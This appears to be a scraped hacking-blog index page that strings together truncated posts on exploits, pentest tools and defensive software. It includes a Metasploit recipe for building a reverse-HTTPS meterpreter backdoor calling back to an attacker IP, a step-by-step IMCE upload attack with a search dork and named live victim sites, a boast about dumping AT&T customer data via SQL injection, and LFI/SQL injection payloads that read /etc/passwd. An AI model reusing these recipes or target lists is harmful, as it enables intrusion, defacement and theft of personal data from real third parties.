MultiObfuscator 2.00

Please download this app. from Source.

MultiObfuscator is a professional cryptography tool that offers double
encryption, csprng based scrambling, csprng based whitening, and more.
Documentation provided.


Source: http://packetstormsecurity.org/files/114693

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Hacked Joomla! v. [1.6.x] [1.7.x] [2.5.0-2.5.2] - Escalation of Privileges

This vulnerability allows us to escalate privileges joomla for registering a new user, for 1.6.x/1.7.x versions have not been issued so far no patch versions and 1.0.x/1.5.x/2.5.3 + are not vulnerable. but for our comfort the v. 1.5.x (which is not patched) joomla has the well-known bug of the token, you can change the admin pass, well that's another topic.




Let us focus on our own and

Wordpress all Version full Path Disclosure Vulnerability By KinG Of PiraTeS

================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \

================================================================================
##

Interesting exploit, Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service

If you want to see the exploit code, please go to the Source.


# Exploit Title: Microsoft IIS 6 , 7.5 FTP Server Remote Denial Of Service (CPU exhaustion)[POC]
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.microsoft.com
# Version: Microsoft IIS 6 , 7.5 FTP Server
# Tested on: windows server 2008 r2 , seven , with two core

Using beef plugin with Metasploit

1. Run the beef service
$/pentest/web/beef/beef -x -v

2. In another console, Run the Metasploit Console
$msfconsole

3. Download beef plugin from https://github.com/xntrik/beefmetasploitplugin.git
$git clone https://github.com/xntrik/beefmetasploitplugin.git

4. Move file beef.rb to msf/plugins and lib/beef to msf/lib

5. Install hpricot gem
$gem install hpricot

6. In the Metasploit console,

Create Auto reconnect Backdoor With Metasploit

This post will show how to install the autoconnect backdoor in victim machine.

1.  Create the auto reconnect backdoor with metasploit.
msf> use payload/windows/meterpreter/reverse_https
msf> set LHOST attacker_IP
msf> set LPORT binding_port
msf> set SessionCommunicationTimeout 0
msf> set SessionExpirationTimeout 0
msf> generate -t exe -f /var/www/backdoor.exe

2. Binding receiving backdoor

"IMCE" <= Remote File Upload Vulnerability

In this vulnerability a Remote Attack can upload his deface page or sometimes even a Shell on the vulnerable website.

Google Dork : inurl:"/imce?dir=" intitle:"File Browser"


Vulnerable URL : http://www.anywebsite.com/imce?dir=


Use both Bing search and Google Search to get more vulnerable website. Select any website from the search result, Like in my case I choose http://www.vride.com/imce?dir=db_backups

Click on "root" to change the current directory to root. Now look for the Upload option, In my case Upload option is present on the top left corner. Click on that. choose your deface Page and Click on Upload Button.

If the file has been uploaded successfully who will get the message that The File Has been uploaded.

Now under the File Name look for the file you uploaded. Like in my case I uploaded a fiile name test.htm <- When you will find your file double click on that to access it.

http://www.vride.com/imce?dir=db_backups

http://www.vride.com/sites/default/files/test.htm <- The File Which I Uploaded

[~]Dem0 :

http://www.arcireal.com/imce?dir=
http://www.la-gerbille.net/imce?dir=
http://ciam.inra.fr/biosp/imce?dir=

Webhoneypot - Web Application Honeypot

DShield.org is offering this honeypot for users to capture automated web application exploits. It is a very simple "semi interactive" honeypot implemented in PHP. 


Source: https://code.google.com/p/webhoneypot/

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

WordPress Application Firewall. Protects against current and future attacks.

WordPress Application Firewall. Protects against current and future attacks. Email notification is disabled by default, notification can be activated and configured in Settings > WP WAF. Go to your WP WAF configuration page.


Source: https://wordpress.org/extend/plugins/wp-waf/

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

AT&T And Hostgator was hack.

<==============================>Target: ATT.comVulnerable Link: REDACTEDVuln. Type: Error-BasedVulnerable paramater: sb=DB: prod<==============================>Well; it just goes to show you, anything is vulnerable. You just have to know where to look. This DB has A LOT of information in it: names, addresses, mobile numbersect..  The information in this dump isn't even 1% of whats in here, I just

Browsers Anti-XSS methods in ASP (classic) have been defeated!

If you want to see full article,please go to the Source.

Browsers Anti-XSS methods in ASP (classic) have been defeated!This time, I want to start with the summary section first to break the rules!SummaryThe intention of this paper is to prove the client-side XSS protection methods must have rules for different web application languages, otherwise they will be bypassed. This research is based on

PENETRATION TESTING PRACTICE LAB - VULNERABLE APPS / SYSTEMS

If you want to see a chart, please go to the Source.

 Vulnerable Web Applications [36 unique web applications]OWASP BWA     http://code.google.com/p/owaspbwa/OWASP Hackademic     http://hackademic1.teilar.gr/Butterfly Security Project     http://thebutterflytmp.sourceforge.net/Foundstone Hackme Bank     http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspxFoundstone Hackme Books     http

escanner Escalation Pentesting Tool

escanner is a small tool that helps you thread scan file(s)/directories recursively for possible vulnerability of insecure file permissions that could result on local privilege escalation due to some misconfiguration of operating systen, software vendors or by users. One example, a local attacker can replace/overwrite the original file to a malicious binary that could perform unauthorized actions

XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities

$------------------------------------------------------------------------------------------------------------$ XAMPP Windows 1.7.7 multiple XSS/Blind SQL Injection Vulnerabilities $ Author : Sangteamtham $ Home : Hcegroup.net $ Download :http://www.apachefriends.org/en/xampp-windows.html $ Date :06/07/2012 $ Twitter: http://twitter.com/Sangte_amtham$***********************************************

F5 BIG-IP remote root authentication bypass Vulnerability (Update Link and payload for Metasploit)

F5 BIG-IP remote root authentication bypass VulnerabilityCVE reference: CVE-2012-1493Affected platforms: BIG-IP platforms without SCCPVersion: 11.x 10.x 9.xDate: 2012-February-16Security risk: HighVulnerability: F5 BIG-IP remote root authentication bypassResearcher: Florent DaigniereVendor Status: Notified / Patch availableVulnerability Disclosure Policy: https://www.trustmatta.com/advisories/

Escaping Restricted Linux Shells

If you want to see all of this article, please go to the Source.

ReconnaissanceThe first step should be to gather a little information. You'll need to know your environment. Run the 'env' command to understand how your profile is configured. You'll see which shell you're running and where your PATH is pointing to. Once you know what your PATH is, list the contents of the directory (i.e. 'ls /

Interesting Vulnerability Today(2012-06-11) Microsoft IIS 6.0, Microsoft IIS 7.5

THIS IS A GENUINE ISOWAREZ RELEASE********************************************************------------------------------------------------------------------------------------------------------------------------------------------------------------Title: Microsoft IIS 6.0 with PHP installed Authentication BypassAffected software:Microsoft IIS 6.0 with PHP installed(tested on Windows Server 2003 SP1

How to use SQLMap POST Request Injection

If you want to see the original post, please go to the Source. 

1. Browse to target site that have form.
2. You can use any intercept proxy to intercept Request from your web browser like Burp, OWASP Zed, etc.
3. Click the button of the form in that web page.
4. Capture and save the Request into the file. [post.txt]
5. Run SQLMap with option -r to read the post.txt to get the information to

Automating SQLMap with data from wapiti By Brandon Perry

 This version was modified to use in Backtrack 5 R2(ruby1.9.4dev), if you want the original version, please go to the Source.

You must to save this script in wapiti path.

#!/usr/bin/env ruby#require 'active_support/secure_random'require 'securerandom'require 'rexml/document'wapiti_path = '/pentest/web/wapiti/'sqlmap_path = '/pentest/database/sqlmap-dev/'wapiti_report_path = '/tmp/wapiti_report

LFI with SQL Injection

Try to search with

inurl:"*.php?*=*"+ ( inurl:"*../*" + ( inurl:"LOAD_FILE" | inurl:"UNION" | inurl:"AND" ) ) + intext:"root:x:0:0:root:/root:**"
 Example that I found

?id=-1+union+select+load_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764)%2Cload_file(0x2f6574632f706173737764) 
?category_ID=5+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)--
?id=36+UNION+all+